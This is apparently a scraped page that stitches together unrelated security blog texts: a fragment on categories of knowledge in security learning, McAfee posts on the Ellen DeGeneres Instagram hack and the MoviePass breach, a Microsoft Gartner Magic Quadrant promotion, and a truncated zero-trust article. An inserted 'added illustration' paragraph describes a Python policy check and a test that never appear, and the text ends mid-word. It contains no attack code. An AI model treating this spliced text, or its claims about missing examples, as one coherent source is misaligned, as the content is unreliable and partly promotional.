Section 1: The certainty. The information that I have. What I am sure is true.
Section 2: The foolishness. The information that I know I’m missing.
Section 3: The uncertainty. The information that I have but that I am not sure is true.
Section 4: The ignorance. The information that I don’t know I don’t have yet.

Let me try to clarify those categories with an example, assuming Alice is our company CIO. Alice knows exactly what cybersecurity defence systems she has implemented, and she knows that eventually her network will be hit by the next cybersecurity attack. This is what we call certainty: in other words, this information is what Alice knows and believes to be true. However, she doesn’t know when the cyber attack will happen, what infrastructure the attacker will hit, or what technique the attacker will use (phishing, exploiting, scam, etc.). This is her foolishness: she knows that she doesn’t know some information, for example who the victim will be. Moreover, Alice is definitely not 100% sure that the countermeasures she adopted will be strong enough to defeat the upcoming cyber attack. This is her uncertainty: she has no idea whether her shields would resist the attack that is going to happen. Finally, Alice doesn’t know that the attacker has unfortunately already pwned the company domain controller. This is what we have defined as ignorance: in other words, all the information that Alice is not aware of.

What a good teaching process should do is increase Section 1 by giving certainties and drastically reduce Sections 2, 3 and 4. In my personal point of view, the academic teaching process (university) is perfect for increasing Section 1 and drastically reducing Section 3. This sounds plausible, since increasing certainty by reducing uncertainty is an evidence-based process built upon tests and research: a typical university-oriented approach. Section 2 should be addressed by professional certifications, which fill foolishness by providing more tactics and techniques to be implemented in the real world. Finally, Section 4 is filled by experience. Direct teaching helps by providing stereotypes, but reality is always different from stereotypes; it is our experience that associates reality with the closest stereotype in order to find the best solution. In other words, it’s hard to know what is not known, and experience is the main road to fight ignorance.

We probably could end-up with an obvious answer to the original question, but I really don’t think there is a preferred path to increase your technical skill, it’s a never ending learning process where every step takes its own time.

Ellen DeGeneres Instagram Hack: What You Can Do to Protect Your Account

Today was not an easy morning for Ellen DeGeneres. She woke to find that her Instagram account was briefly hacked according to the talk show host’s Twitter and Yahoo Entertainment. A series of giveaways offering free Tesla cars, MacBooks, and more, were posted to the talk show host’s account last night. After seeing the posts, some of her followers became skeptical and warned her of the suspicious behavior. They were smart to flag the giveaways as untrustworthy because DeGeneres confirmed that her Instagram was in fact affected by malicious activity.

While Ellen joked about “password” not being the most secure password, it’s always a best practice to use strong passwords that differ from each of your other accounts to avoid easy break-ins from cybercriminals.

One of the central reasons hackers target social media accounts is to retrieve stored personal information. Once cybercriminals log into an account, they have access to everything that has ever been shared with the platform, such as date of birth, email, hometown, and answers to security questions. They then could potentially use this information to try to log into other accounts or even steal the person’s identity, depending on the level of information they have access to.

Another motive for hijacking a user’s social media account is to spread phishing scams or malware amongst the user’s network. In DeGeneres’ case, her 76 million Instagram followers were prompted to click on links that were scams disguised as giveaways so hackers could steal their personal information. In other cases, hackers will use adware so they can profit off of clicks and gain access to even more valuable information from you and your contacts. Sometimes these cybercriminals will post publicly on your behalf to reach your entire network, and other times they will read through private messages and communicate with your close network directly.

It’s not just celebrities that are vulnerable to cybercriminals. In fact, over 22% of internet users reported that their online accounts have been hacked at least once, and more than 14% said that they were hacked more than once. If your account gets hacked, the first step is to change your password right away and notify your network, so they don’t click on any specious links.

The good news is that by taking proper precautions, you can significantly reduce risk to help keep your account safe. Here are five best practices for protecting your social media accounts from malicious activity:

  • Use your best judgment and don’t click on suspicious messages or links, even if they appear to be posted by a friend.
  • Flag any scam posts or messages you encounter on social media to the platform, so they can help stop the threat from spreading.
  • Use unique, complicated passwords for all your accounts.
  • Avoid posting any identifying information or personal details that might allow a hacker to guess your security questions.
  • Always use comprehensive security software that can keep you protected from the latest threats.

To stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Ellen DeGeneres Instagram Hack: What You Can Do to Protect Your Account appeared first on McAfee Blogs.

Lights, Camera, Cybersecurity: What You Need to Know About the MoviePass Breach

If you’re a frequent moviegoer, there’s a chance you may have used or are still using movie ticket subscription service and mobile app MoviePass. The service is designed to let film fanatics attend a variety of movies for a convenient price, however, it has now made data convenient for cybercriminals to potentially get ahold of. According to TechCrunch, the exposed database contained 161 million records, with many of those records including sensitive user information.

So, what exactly do these records include? The exposed user data includes 58,000 personal credit cards and customer card numbers, which are similar to normal debit cards. They are issued by Mastercard and store a cash balance that users can use to pay so they can watch a catalog of movies. In addition to the MoviePass customer cards and financial information numbers, other exposed data includes billing addresses, names, and email addresses. TechCrunch reported that a combination of this data could very well be enough information to make fraudulent purchases.

The database also contained what researchers presumed to be hundreds of incorrectly typed passwords with user email addresses. With this data, TechCrunch attempted to log into the database using a fake email and password combination. Not only did they immediately gain access to the MoviePass account, but they found that the fake login credentials were then added to the database.

Since then, TechCrunch reached out to MoviePass and the company has since taken the database offline. However, with this personal and financial information publicly accessible for quite some time, users must do everything in their power to safeguard their data. Here are some tips to help keep your sensitive information secure:

  • Review your accounts. Be sure to look over your credit card and banking statements and report any suspicious activity as soon as possible.
  • Place a fraud alert. If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity.
  • Consider using identity theft protection. A solution like McAfee Identity Theft Protection will help you to monitor your accounts and alert you of any suspicious activity.

And, as always, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Lights, Camera, Cybersecurity: What You Need to Know About the MoviePass Breach appeared first on McAfee Blogs.

Gartner names Microsoft a Leader in 2019 Endpoint Protection Platforms Magic Quadrant

Our mission as a company is to empower every person on the planet to achieve more. We deliver on that mission through products that achieve the highest marks in the industry, which we believe is inclusive of Gartner’s Magic Quadrant. We have been on a journey for the last several years working hard to offer our customers leading endpoint protection so they can defend against increasingly sophisticated attacks across a variety of devices, which is why we are so proud to have placed in the Leaders quadrant for this year’s 2019 Gartner EPP Magic Quadrant and positioned highest in execution!

According to Gartner, “Leaders demonstrate balanced and consistent progress and effort in all execution and vision categories. They have broad capabilities in advanced malware protection, and proven management capabilities for large enterprise accounts.” Our latest product offerings prove that we’ve risen to the challenge that today’s threat landscape presents. This achievement represents our ability to provide best-in-class protection and deliver on innovations that learn and evolve just as attackers change their tactics.

Gartner Endpoint Protection Platforms Magic Quadrant

According to Gartner, “An endpoint protection platform (EPP) is a solution deployed on endpoint devices to prevent file-based malware, malicious scripts and memory-based threats. It is also deployed to detect and block malicious activity from trusted and untrusted applications, and to provide the investigation and remediation capabilities needed to dynamically respond to security incidents and alerts”.

Over the last years we continuously evolved our endpoint security platform, Microsoft Defender Advanced Threat Protection (ATP), by further enhancing existing features and by adding new and innovative capabilities, including:

  • Multi-layered protection: Microsoft Defender ATP provides multi-layered protection (built into the endpoint and cloud-powered) from file-based malware, malicious scripts, memory-based attacks, and other advanced threats
  • Threat Analytics: Contextual threat reports provide SecOps with near real-time visibility on how threats impact their organizations
  • A new approach to Threat and Vulnerability Management: Real-time discovery, prioritization based-on business context and dynamic threat landscape, and built-in remediation process speed up mitigation of vulnerabilities and misconfiguration
  • Built-in, cloud-powered protections: Real-time threat detection and protection with built-in advanced capabilities protect against broad-scale and targeted attacks like phishing and malware campaigns
  • Behavioral detections: Endpoint detection and response (EDR) sensor built into Windows 10 for deeper insights of kernel and memory, and leveraging broad reputation data for files, IPs, URLs, etc., derived from the rich portfolio of Microsoft security services
  • “Deployment” is as easy as it gets by being built directly into the operating system. There is no agent to deploy, no delays or compatibility issues, and no additional performance overhead or conflicts with other products. No deployment and no on-premises infrastructure directly leads to lower TCO.
  • Contain the threat: Dramatically reduces the risk by strengthening your defenses when potential threats are detected. Microsoft Defender ATP can automatically apply Conditional Access to restrict the endpoint from accessing corporate data until the threat is remediated.
  • Automated security: From alerts to remediation in minutes – at scale. Microsoft Defender ATP leverages AI to automatically investigate alerts, determine if a threat is active, what course of action to take, and then remediate complex threats in minutes.
  • Secure Score: Watch your security score rise in the Microsoft Defender Security Center as you implement automated and recommended actions to protect both users and data. Microsoft Defender ATP not only tells you that you have a problem, but Microsoft Defender ATP also recommends how to solve it (and track the execution) with Secure Score. Vulnerability and configuration information provide weighted recommendations and actions to improve endpoint hardening and compare the current posture with the industry and global peers for benchmarking.
  • Microsoft Threat Experts: Microsoft has your back — with Microsoft’s managed detection and response (MDR) service (called Microsoft Threat Experts), Microsoft supports customers’ incident response and alert analysis. Our automated threat hunting service helps ensure that potential threats don’t go unnoticed.

Download this complimentary full report and read the analysis behind Microsoft’s positioning as a “Leader”. As we continue on this journey and add even more capabilities to protect against, detect and respond to this evolving threat landscape, we welcome our customers’ feedback and partnership so we can continue to deliver best-in-class protection.

For more information about our endpoint protection platform, or to sign up for a trial, visit our Microsoft Defender Advanced Threat Protection (ATP) page.


Gartner Magic Quadrant for Endpoint Protection Platforms, Peter Firstbrook, Dionisio Zumerle, Prateek Bhajanka, Lawrence Pingree, Paul Webber, 20 August 2019.

Gartner Competitive Landscape: Endpoint Protection Platforms, Worldwide, 2019, Lawrence Pingree, 20 May 2019.

This graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from http://www.gartner.com/reprints/?id=1-1OCBC1P5&ct=190731&st=sb.

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

The post Gartner names Microsoft a Leader in 2019 Endpoint Protection Platforms Magic Quadrant appeared first on Microsoft Security.

The transformation of enterprise security from 2017 to 2019

Estimated reading time: 2 minutes

The nature of enterprise security is such that it continuously keeps evolving. Trends change, threats vary and morph into different entities, and approaches that seem relevant become outdated in six months or sometimes even less. For enterprises looking to stay ahead of the curve when it comes to cybersecurity, standing still is not an option. The need of the hour is to keep abreast of the latest trends and technologies to stay safe.

Thanks to the speed of transformation, enterprise security has seen manifold changes in the last two years, some driven by need and some by necessity. These changes can be summed up in the following points:

A move towards a zero-trust network

More and more organizations are moving towards a zero-trust model in which no one and nothing is trusted by default. Introduced by the American market research giant Forrester Research, the zero-trust network model eliminates the concept of a perimeter and calls for enterprises to inspect all network traffic without any classification into ‘internal’ and ‘external’. Basically, no user or traffic is considered ‘authorized’ up front, and all access to a specific network is governed by the same set of rules.
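As an added illustration (not code from the original post, from Forrester or from Microsoft), the following compact policy check contrasts a perimeter model, which trusts anything on the corporate LAN, with the zero-trust rule described above, where every request passes the same identity and device-posture gate whatever network it comes from; the posture gate also models the “restrict the endpoint until the threat is remediated” conditional-access behaviour from the Defender ATP list earlier on this page. All user names, device identifiers, IP ranges and the posture feed are constructed for the example.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

# Constructed corporate LAN range (hypothetical).
CORP_LAN = ip_network("10.0.0.0/8")

# Constructed endpoint posture feed: device id -> "healthy" or "at_risk".
DEVICE_POSTURE = {"lt-0001": "healthy", "lt-0002": "at_risk"}

# Constructed resource ACL: resource -> set of principals allowed to use it.
ACL = {"finance-db": {"alice"}, "wiki": {"alice", "bob"}}


@dataclass(frozen=True)
class Request:
    user: str        # authenticated principal, "" if no identity was presented
    mfa: bool        # strong authentication completed for this session
    device_id: str   # enrolled endpoint the request originates from
    src_ip: str      # source address as seen by the gateway
    resource: str    # resource being requested


def perimeter_allow(req: Request) -> bool:
    """Perimeter model: anything arriving from the corporate LAN is trusted
    outright; only external requests are checked for identity and ACL."""
    if ip_address(req.src_ip) in CORP_LAN:
        return True
    return req.mfa and req.user in ACL.get(req.resource, set())


def zero_trust_allow(req: Request) -> bool:
    """Zero-trust model: the same rules apply to every request, and the
    source network is never consulted as a trust signal."""
    if not req.user or not req.mfa:
        return False                      # unauthenticated traffic is never 'authorized'
    if DEVICE_POSTURE.get(req.device_id) != "healthy":
        return False                      # conditional access: at-risk endpoint cut off until remediated
    return req.user in ACL.get(req.resource, set())
```

The first request in the test below is an unauthenticated session from an at-risk laptop on the LAN: the perimeter model waves it through, the zero-trust model refuses it.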

The evolution from 4G to 5G

In 2017, enterprise security needed to understand 4G – now, network technology has evolved to such an extent that the world is embracing 5G. It is a trend which enterprises must als